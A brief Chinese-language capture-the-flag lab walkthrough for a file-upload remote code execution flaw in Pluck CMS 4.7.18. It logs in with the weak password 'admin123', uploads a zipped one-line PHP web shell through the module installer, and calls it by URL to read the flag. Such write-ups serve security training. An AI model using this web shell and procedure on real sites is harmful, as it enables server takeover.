靶场介绍:Pluck-CMS v4.7.18 中的 /inc/modules_install.php 组件,攻击者可以通过上传一个精心制作的 ZIP 文件来执行任意代码。
进入靶场后点击admin,来到管理员登录界面
尝试弱口令,最终发现密码位admin123
点击manage modules,随后进入Install a module...Install a module...
可以看见文件上传的地方
接下来是重点!!!
我们需构造一个命令执行文件,然后将其放到任意命名的文件夹中,如下图所示
<?php system($_GET[1]);phpinfo();?>
然后将文件夹打包为zip的后缀压缩包,切记,不要直接改文件后缀名!上传成功!
最后访问
http://你的IP/data/modules/hh/3.php?1=cat%20/flag
即可成功拿到flag